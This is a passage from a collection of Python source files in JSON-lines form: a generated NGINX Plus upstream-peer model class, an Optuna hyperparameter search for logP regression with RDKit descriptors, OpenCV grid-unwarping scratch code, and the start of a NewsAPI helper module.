up”, “draining”, “down”, “unavail”, “checking”, and “unhealthy”. # noqa: E501\n\n :return: The state of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, state):\n \"\"\"Sets the state of this NginxHTTPUpstreamPeer.\n\n Current state, which may be one of “up”, “draining”, “down”, “unavail”, “checking”, and “unhealthy”. # noqa: E501\n\n :param state: The state of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"up\", \"draining\", \"down\", \"unavail\", \"checking\", \"unhealthy\"] # noqa: E501\n if state not in allowed_values:\n raise ValueError(\n \"Invalid value for `state` ({0}), must be one of {1}\" # noqa: E501\n .format(state, allowed_values)\n )\n\n self._state = state\n\n @property\n def active(self):\n \"\"\"Gets the active of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The current number of active connections. # noqa: E501\n\n :return: The active of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._active\n\n @active.setter\n def active(self, active):\n \"\"\"Sets the active of this NginxHTTPUpstreamPeer.\n\n The current number of active connections. # noqa: E501\n\n :param active: The active of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._active = active\n\n @property\n def max_conns(self):\n \"\"\"Gets the max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The max_conns limit for the server. # noqa: E501\n\n :return: The max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._max_conns\n\n @max_conns.setter\n def max_conns(self, max_conns):\n \"\"\"Sets the max_conns of this NginxHTTPUpstreamPeer.\n\n The max_conns limit for the server. # noqa: E501\n\n :param max_conns: The max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._max_conns = max_conns\n\n @property\n def requests(self):\n \"\"\"Gets the requests of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of client requests forwarded to this server. # noqa: E501\n\n :return: The requests of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._requests\n\n @requests.setter\n def requests(self, requests):\n \"\"\"Sets the requests of this NginxHTTPUpstreamPeer.\n\n The total number of client requests forwarded to this server. # noqa: E501\n\n :param requests: The requests of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._requests = requests\n\n @property\n def responses(self):\n \"\"\"Gets the responses of this NginxHTTPUpstreamPeer. # noqa: E501\n\n\n :return: The responses of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: NginxHTTPUpstreamPeerResponses\n \"\"\"\n return self._responses\n\n @responses.setter\n def responses(self, responses):\n \"\"\"Sets the responses of this NginxHTTPUpstreamPeer.\n\n\n :param responses: The responses of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: NginxHTTPUpstreamPeerResponses\n \"\"\"\n\n self._responses = responses\n\n @property\n def sent(self):\n \"\"\"Gets the sent of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of bytes sent to this server. # noqa: E501\n\n :return: The sent of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._sent\n\n @sent.setter\n def sent(self, sent):\n \"\"\"Sets the sent of this NginxHTTPUpstreamPeer.\n\n The total number of bytes sent to this server. # noqa: E501\n\n :param sent: The sent of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._sent = sent\n\n @property\n def received(self):\n \"\"\"Gets the received of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of bytes received from this server. # noqa: E501\n\n :return: The received of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._received\n\n @received.setter\n def received(self, received):\n \"\"\"Sets the received of this NginxHTTPUpstreamPeer.\n\n The total number of bytes received from this server. # noqa: E501\n\n :param received: The received of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._received = received\n\n @property\n def fails(self):\n \"\"\"Gets the fails of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of unsuccessful attempts to communicate with the server. # noqa: E501\n\n :return: The fails of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._fails\n\n @fails.setter\n def fails(self, fails):\n \"\"\"Sets the fails of this NginxHTTPUpstreamPeer.\n\n The total number of unsuccessful attempts to communicate with the server. # noqa: E501\n\n :param fails: The fails of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._fails = fails\n\n @property\n def unavail(self):\n \"\"\"Gets the unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n\n How many times the server became unavailable for client requests (state “unavail”) due to the number of unsuccessful attempts reaching the max_fails threshold. # noqa: E501\n\n :return: The unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._unavail\n\n @unavail.setter\n def unavail(self, unavail):\n \"\"\"Sets the unavail of this NginxHTTPUpstreamPeer.\n\n How many times the server became unavailable for client requests (state “unavail”) due to the number of unsuccessful attempts reaching the max_fails threshold. # noqa: E501\n\n :param unavail: The unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._unavail = unavail\n\n @property\n def health_checks(self):\n \"\"\"Gets the health_checks of this NginxHTTPUpstreamPeer. # noqa: E501\n\n\n :return: The health_checks of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: NginxHTTPUpstreamPeerHealthChecks\n \"\"\"\n return self._health_checks\n\n @health_checks.setter\n def health_checks(self, health_checks):\n \"\"\"Sets the health_checks of this NginxHTTPUpstreamPeer.\n\n\n :param health_checks: The health_checks of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: NginxHTTPUpstreamPeerHealthChecks\n \"\"\"\n\n self._health_checks = health_checks\n\n @property\n def downtime(self):\n \"\"\"Gets the downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n\n Total time the server was in the “unavail”, “checking”, and “unhealthy” states. # noqa: E501\n\n :return: The downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._downtime\n\n @downtime.setter\n def downtime(self, downtime):\n \"\"\"Sets the downtime of this NginxHTTPUpstreamPeer.\n\n Total time the server was in the “unavail”, “checking”, and “unhealthy” states. # noqa: E501\n\n :param downtime: The downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._downtime = downtime\n\n @property\n def downstart(self):\n \"\"\"Gets the downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The time (in milliseconds since Epoch) when the server became “unavail”, “checking”, or “unhealthy”. # noqa: E501\n\n :return: The downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._downstart\n\n @downstart.setter\n def downstart(self, downstart):\n \"\"\"Sets the downstart of this NginxHTTPUpstreamPeer.\n\n The time (in milliseconds since Epoch) when the server became “unavail”, “checking”, or “unhealthy”. # noqa: E501\n\n :param downstart: The downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._downstart = downstart\n\n @property\n def selected(self):\n \"\"\"Gets the selected of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The time (in milliseconds since Epoch) when the server was last selected to process a request. # noqa: E501\n\n :return: The selected of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._selected\n\n @selected.setter\n def selected(self, selected):\n \"\"\"Sets the selected of this NginxHTTPUpstreamPeer.\n\n The time (in milliseconds since Epoch) when the server was last selected to process a request. # noqa: E501\n\n :param selected: The selected of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._selected = selected\n\n @property\n def header_time(self):\n \"\"\"Gets the header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The average time to get the response header from the server. # noqa: E501\n\n :return: The header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._header_time\n\n @header_time.setter\n def header_time(self, header_time):\n \"\"\"Sets the header_time of this NginxHTTPUpstreamPeer.\n\n The average time to get the response header from the server. # noqa: E501\n\n :param header_time: The header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._header_time = header_time\n\n @property\n def response_time(self):\n \"\"\"Gets the response_time of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The average time to get the full response from the server. # noqa: E501\n\n :return: The response_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._response_time\n\n @response_time.setter\n def response_time(self, response_time):\n \"\"\"Sets the response_time of this NginxHTTPUpstreamPeer.\n\n The average time to get the full response from the server. # noqa: E501\n\n :param response_time: The response_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._response_time = response_time\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, NginxHTTPUpstreamPeer):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"nginxplus/models/nginx_http_upstream_peer.py","file_name":"nginx_http_upstream_peer.py","file_ext":"py","file_size_in_byte":23122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"385208642","text":"# $ python3 newcomer3_6.py fukunishi_data.csv\n\nimport warnings\nwarnings.simplefilter('ignore')\n\nimport sys\nimport math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom rdkit import Chem, DataStructs\nfrom rdkit.Chem import AllChem, Descriptors, Descriptors3D\nfrom rdkit.ML.Descriptors import MoleculeDescriptors\nfrom RDKit_calc import RDKit_calculator\n\nfrom sklearn import *\nfrom sklearn.linear_model import *\nfrom sklearn.ensemble import RandomForestRegressor as RFR\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\n\nimport lightgbm as lgb\nimport optuna\n# import optuna.integration.lightgbm as olgb\n\n#*================================================*\n#Prepare for searching hyper parameter \n\ndef result_reg(reg):\n\treg.fit(X_train, y_train)\n\ty_pred = reg.predict(X_test)\n\tprint('#---------------------------------------#')\n\tprint('RMSE : ' + str(math.sqrt(mean_squared_error(y_test, y_pred))))\n\tprint('Q^2 : ' + str(r2_score(y_test, y_pred)))\n\tprint('#---------------------------------------#')\n\ndef objective_Ridge(trial):\n\talpha = trial.suggest_loguniform('alpha', 1e-4, 15)\n\tmax_iter = trial.suggest_loguniform('max_iter', 1, 1000)\n\n\treg = Ridge(alpha=alpha,\n\t\t\t max_iter=max_iter)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_BRidge(trial):\n\talpha_1 = trial.suggest_loguniform('alpha_1', 1e-8, 1e-4)\n\talpha_2 = trial.suggest_loguniform('alpha_2', 1e-8, 1e-4)\n\tlambda_1 = trial.suggest_loguniform('lambda_1', 1e-8, 1e-4)\n\tlambda_2 = trial.suggest_loguniform('lambda_2', 1e-8, 1e-4)\n\tn_iter = trial.suggest_int('n_iter', 1, 500)\n\n\treg = BayesianRidge(alpha_1=alpha_1,\n\t\t\t\t\t\talpha_2=alpha_2,\n\t\t\t\t\t\tlambda_1=lambda_1,\n\t\t\t\t\t\tlambda_2=lambda_2,\n\t\t\t\t\t n_iter=n_iter)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_SVR(trial):\n\tkernel = trial.suggest_categorical('kernel', ['linear', 'poly', 'rbf', 'sigmoid'])\n\tgamma = trial.suggest_categorical('gamma', ['scale', 'auto'])\n\ttol = trial.suggest_loguniform('tol', 1e-5, 1e-1)\n\tC = trial.suggest_loguniform('C', 1e-4, 10)\n\tepsilon = trial.suggest_loguniform('epsilon', 1e-4, 1e-1)\n\n\treg = svm.SVR(kernel=kernel,\n\t\t\t\t gamma=gamma,\n\t\t\t\t tol=tol,\n\t\t\t\t C=C,\n\t\t\t\t epsilon=epsilon)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_KN(trial):\n\tn_neighbors = trial.suggest_int('n_neighbors', 1, 15)\n\tweights = trial.suggest_categorical('weights', ['uniform', 'distance'])\n\talgorithm = trial.suggest_categorical('algorithm', ['auto', 'ball_tree', 'kd_tree', 'brute'])\n\tleaf_size = trial.suggest_int('leaf_size', 10, 50)\n\n\treg = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors,\n\t\t\t\t\t\t\t\t \t weights=weights,\n\t\t\t\t\t\t\t\t\t algorithm=algorithm,\n\t\t\t\t\t\t\t\t\t leaf_size=leaf_size,\n\t\t\t\t\t\t\t\t\t n_jobs=-1)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_RFR(trial):\n\tn_estimators = trial.suggest_int('n_estimators', 50, 200)\n\tmax_depth = trial.suggest_int('max_depth', 100, 500)\n\tmin_samples_split = trial.suggest_int('min_samples_split', 2, 5)\n\tmin_samples_leaf = trial.suggest_int('min_samples_leaf', 1, 10)\n\tmax_features = trial.suggest_categorical('max_features', ['auto', 'sqrt', 'log2'])\n\n\treg = RFR(n_estimators=n_estimators,\n\t\t\t max_depth=max_depth,\n\t\t\t min_samples_split=min_samples_split,\n\t\t\t min_samples_leaf=min_samples_leaf,\n\t\t\t max_features=max_features,\n\t\t\t n_jobs=-1,\n\t\t\t random_state=0)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\n\ndef objective_LGB(trial):\n\tboosting_type = trial.suggest_categorical('boosting_type', ['gbdt', 'goss'])\n\tnum_leaves = trial.suggest_int('num_leaves', 30, 100)\n\tmax_depth = trial.suggest_int('max_depth', 700, 1000)\n\tlearning_rate = trial.suggest_loguniform('learning_rate', 5e-3, 5e-1)\n\tn_estimators = trial.suggest_int('n_estimators', 200, 500)\n\tmin_child_weight = trial.suggest_loguniform('min_child_weight', 1e-8, 1e-5)\n\tmin_child_samples = trial.suggest_int('min_child_samples', 8, 30)\n\treg_lambda = trial.suggest_loguniform('reg_lambda', 1e-9, 1e-5)\n\n\treg = lgb.LGBMRegressor(boosting_type=boosting_type,\n\t\t\t\t\t\t\tnum_leaves=num_leaves,\n\t\t\t\t\t\t\tmax_depth=max_depth,\n\t\t\t\t\t\t\tlearning_rate=learning_rate,\n\t\t\t\t\t\t\tn_estimators=n_estimators,\n\t\t\t\t\t\t\tmin_child_weight=min_child_weight,\n\t\t\t\t\t\t\tmin_child_samples=min_child_samples,\n\t\t\t\t\t\t\treg_lambda=reg_lambda,\n\t\t\t\t\t\t\tn_jobs=-1,\n\t\t\t\t\t\t\trandom_state=0)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\n# def lgb_cv(X, y):\n# \tds = olgb.Dataset(X, y)\n# \tparams = {'objective':'regression',\n# \t\t\t 'metric':'rmse',\n# \t\t\t 'random_seed':0}\n# \ttuner = olgb.LightGBMTunerCV(params, ds, verbose_eval=-1, num_boost_round=1000, folds=KFold(n_splits=4), verbosity=-1)\n# \ttuner.run()\n# \tprint('LightGBM : Best parameters')\n# \tprint(tuner.best_params)\n# \tresult_reg(lgb.LGBMRegressor(**tuner.best_params), X, y)\n\n#*================================================*\n\ndf = pd.read_csv(sys.argv[1])\nsmiles = df['SMILES'].values\nRDKit_descriptor = RDKit_calculator(smiles)\n\n#set explanatory variables and response variable\nX = RDKit_descriptor.compute_2D_desc()\ny = df['LogP app'].values\n\n#Standardization of explanatory variables\nsc = StandardScaler()\nX = sc.fit_transform(X)\n\n#split data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=95, random_state=0)\n\n# study = optuna.create_study()\n# study.optimize(objective_Ridge, n_trials=100)\n# print('Ridge : Best parameters')\n# print(study.best_params)\n# result_reg(Ridge(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_BRidge, n_trials=100)\n# print('BayesianRidge : Best parameters')\n# print(study.best_params)\n# result_reg(BayesianRidge(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_SVR, n_trials=100)\n# print('SVR : Best parameters')\n# print(study.best_params)\n# result_reg(svm.SVR(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_KN, n_trials=100)\n# print('KNeighborsRegressor : Best parameters')\n# print(study.best_params)\n# result_reg(neighbors.KNeighborsRegressor(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_RFR, n_trials=100)\n# print('RFR : Best parameters')\n# print(study.best_params)\n# result_reg(RFR(**study.best_params))\n\nstudy = optuna.create_study()\nstudy.optimize(objective_LGB, n_trials=100)\nprint('LGB : Best parameters')\nprint(study.best_params)\nresult_reg(lgb.LGBMRegressor(**study.best_params))\n\n# lgb_cv(X, y)\n","sub_path":"newcomer3/newcomer3_6.py","file_name":"newcomer3_6.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"584610079","text":"import cv2\n\nimg = cv2.imread('120_5096.jpg', cv2.CV_LOAD_IMAGE_COLOR)\ncv2.namedWindow('Image')\ncv2.imshow('Image',img)\ncv2.waitKey(0)\n##cv2.destroyAllWindows()\n\ngray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow('color_image',image)\ncv2.imshow('gray_image',gray_image)\ncv2.waitKey(0)\n\n\nIn [81]: centroids = np.array(centroids,dtype = np.float32)\n\nIn [82]: c = centroids.reshape((shape(centroids)[0],shape(centroids)[1]))\n\nIn [86]: a = shape(centroids)[0]\n\nIn [87]: b = np.vstack([c2[i*(a/10):(i+1)*(a/10)][np.argsort(c2[i*(a/10):(i+1)*(a/10),0])] for i in xrange(a/10)])\n\nbm = b.reshape(((a/10),(a/10),2))\n\n\n\n############################################################################################################################################################\n\n## unwarp image (Sudoku Solver example)\n\n# 1. Image PreProcessing ( closing operation )\n\nimg = cv2.imread('120_5256.jpg') # 120_5096\nimg = cv2.GaussianBlur(img,(5,5),0)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nmask = np.zeros((gray.shape),np.uint8)\nkernel1 = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(11,11)) # ellipsiodal kernel (should test using other kernels to see the difference)\n\nclose = cv2.morphologyEx(gray,cv2.MORPH_CLOSE,kernel1) # advanced morphological transformation (closing operation - removing small black areas)\ndiv = np.float32(gray)/(close) # cleans up the image (no idea why!)\nres = np.uint8(cv2.normalize(div,div,0,255,cv2.NORM_MINMAX)) # linear normalization\nres2 = cv2.cvtColor(res,cv2.COLOR_GRAY2BGR) # gray to RGB\n\n# 2. Finding Sudoku Square and Creating Mask Image\n\nthresh = cv2.adaptiveThreshold(res,255,0,1,19,2)\ncontour,hier = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\nmax_area = 0\nbest_cnt = None\nfor cnt in contour:\n area = cv2.contourArea(cnt)\n if area > 1000: # need to test other values for project images\n if area > max_area:\n max_area = area\n best_cnt = cnt\n\ncv2.drawContours(mask,[best_cnt],0,255,-1)\ncv2.drawContours(mask,[best_cnt],0,0,2)\n\nres = cv2.bitwise_and(res,mask)\n\n# 3. Finding Vertical lines\n\nkernelx = cv2.getStructuringElement(cv2.MORPH_RECT,(2,10)) # a 2 by 10 rectangle\n\ndx = cv2.Sobel(res,cv2.CV_16S,1,0)\ndx = cv2.convertScaleAbs(dx)\ncv2.normalize(dx,dx,0,255,cv2.NORM_MINMAX)\nret,close = cv2.threshold(dx,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,kernelx,iterations = 1)\n\ncontour, hier = cv2.findContours(close,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\nfor cnt in contour:\n x,y,w,h = cv2.boundingRect(cnt)\n if h/w > 5:\n cv2.drawContours(close,[cnt],0,255,-1)\n else:\n cv2.drawContours(close,[cnt],0,0,-1)\nclose = cv2.morphologyEx(close,cv2.MORPH_CLOSE,None,iterations = 2)\nclosex = close.copy()\n\n# 4. Finding Horizontal Lines\n\nkernely = cv2.getStructuringElement(cv2.MORPH_RECT,(10,2))\ndy = cv2.Sobel(res,cv2.CV_16S,0,2)\ndy = cv2.convertScaleAbs(dy)\ncv2.normalize(dy,dy,0,255,cv2.NORM_MINMAX)\nret,close = cv2.threshold(dy,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,kernely)\n\ncontour, hier = cv2.findContours(close,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\nfor cnt in contour:\n x,y,w,h = cv2.boundingRect(cnt)\n if w/h > 5:\n cv2.drawContours(close,[cnt],0,255,-1)\n else:\n cv2.drawContours(close,[cnt],0,0,-1)\n\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,None,iterations = 2)\nclosey = close.copy()\n\n# 5. Finding Grid Points\n\nres = cv2.bitwise_and(closex,closey)\n\n############################################################################################################################################################\n\n## get rid of the grids\n\nres = cv2.bitwise_or(closex, closey)\nx = np.where(res > 0)\nx = np.array(x)\n\nfor i in range(shape(x)[1]):\n gray[x[0,i], x[1,i]] = 255\n\n############################################################################################################################################################\n\n# 6. Correcting the defects\n\ncontour, hier = cv2.findContours(res,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\ncentroids = []\nfor cnt in contour:\n mom = cv2.moments(cnt)\n (x,y) = int(mom['m10']/mom['m00']), int(mom['m01']/mom['m00'])\n cv2.circle(img,(x,y),4,(0,255,0),-1)\n centroids.append((x,y))\n\ncentroids = np.array(centroids,dtype = np.float32)\nc = centroids.reshape((shape(centroids)[0],2)) # check whether this line is required or not\n\n### just to properly sort the centroid indices\n\nc2 = c[np.argsort(c[:,1])] # sort along y-axis (sort the values along y-axis only leaving x-axis as it is to get the coordinates with y-axis sorted)\n # (100,2) array\n\nb = np.vstack([c2[i*10:(i+1)*10][np.argsort(c2[i*10:(i+1)*10,0])] for i in xrange(10)])\nbm = b.reshape((10,10,2))\n####\n\n# unwarp the image\n\noutput = np.zeros((450,450,3),np.uint8)\nfor i,j in enumerate(b): # almost like a percentage basis\n ri = i/10\n ci = i%10\n if ci != 9 and ri!=9:\n src = bm[ri:ri+2, ci:ci+2 , :].reshape((4,2))\n dst = np.array( [ [ci*50,ri*50],[(ci+1)*50-1,ri*50],[ci*50,(ri+1)*50-1],[(ci+1)*50-1,(ri+1)*50-1] ], np.float32) # see tutorial for details (logic)\n retval = cv2.getPerspectiveTransform(src,dst)\n warp = cv2.warpPerspective(res2,retval,(450,450))\n output[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n\n############################################################################################################################################################\n\n## edit for project\n\na = round(shape(c2)[0]/10)\nb = np.vstack([c2[i*a:(i+1)*a][np.argsort(c2[i*a:(i+1)*a,0])] for i in xrange(10)])\na1 = round(shape(c2)[0]/a)\nbm = b.reshape((a1,a,2))\noutput = np.zeros((432, 576, 3),np.uint8)\n\nfor i,j in enumerate(b):\n ri = i/6\n ci = i%10\n if ri != 9 and ci < 5:\n src = bm[ri:ri+2, ci:ci+2 , :].reshape((4,2))\n #print i, src\n dst = np.array( [ [ci*50,ri*50],[(ci+1)*50-1,ri*50],[ci*50,(ri+1)*50-1],[(ci+1)*50-1,(ri+1)*50-1] ], np.float32)\n retval = cv2.getPerspectiveTransform(src,dst)\n warp = cv2.warpPerspective(res2,retval,(432, 576))\n output[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n\n\nretval = cv2.getPerspectiveTransform(src,dst)\nwarp = cv2.warpPerspective(res2,retval,(450,450))\noutput[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n","sub_path":"Other files (test scripts etc.)/OpenCV.py","file_name":"OpenCV.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"396929147","text":"\"\"\"\nThis file hold functions and constants that are specific to the\nNews API at http://newsapi.org\n\"\"\"\n\nimport logging\n\nfrom newsapi import NewsApiClient\n\nlogger = logging.getLogger(__name__)\n\ndef get_all_sources(news_api_key):\n\t\"\"\"\n\tReturn all the sources from the NewsAPI.\n\n\tReturn format:\n\t\tIf no error:\n\t\t\t[\n\t\t\t\t{\n\t\t\t\t\t'id': 'abc-news',\n\t\t\t\t\t'name': 'ABC News',\n\t\t\t\t\t'description': 'Your trusted source for breaking blah blah.',\n\t\t\t\t\t'url': 'https://abcnews.go.com',\n\t\t\t\t\t'category': 'general',\n\t\t\t\t\t'language': 'en',\n\t\t\t\t\t'country': 'us'\n\t\t\t\t}\n\t\t\t]\n\t\tIf error:\n\t\t\tRasies exception.\n\t\"\"\"\n\tnews_api_client = NewsApiClient(api_key=news_api_key)\n\n\t# This can also raise an excption\n\tsources = news_api_client.get_sources()\n\n\tif sources[\"status\"] == \"ok\":\n\t\t# We're all good\n\t\treturn sources[\"sources\"]\n\telse:\n\t\tlogger.exception(\"Error getting sources. Got the following return object: {0}\".format(\n\t\t\tsources\n\t\t), exc_info=True)\n\n\t\traise Exception(\"There was an error getting sources. See log.\")\n\ndef get_top_articles(source_id, news_api_key):\n\t\"\"\"\n\tReturn all the current top articles from the given source.\n\tIf there is any error whatsoever, this will throw an exception. So, if articles are returned\n\tand the fuunc exits successfully, there have been no errors.\n\n\tReturn format:\n\t\tIf error:\n\t\t\traises Exception\n\t\tIf no error:\n\t\t\t[\n\t\t\t\t{\n\t\t\t\t\t'source_id': 'abc-news', \n\t\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t\t'content': 'Florida Republican 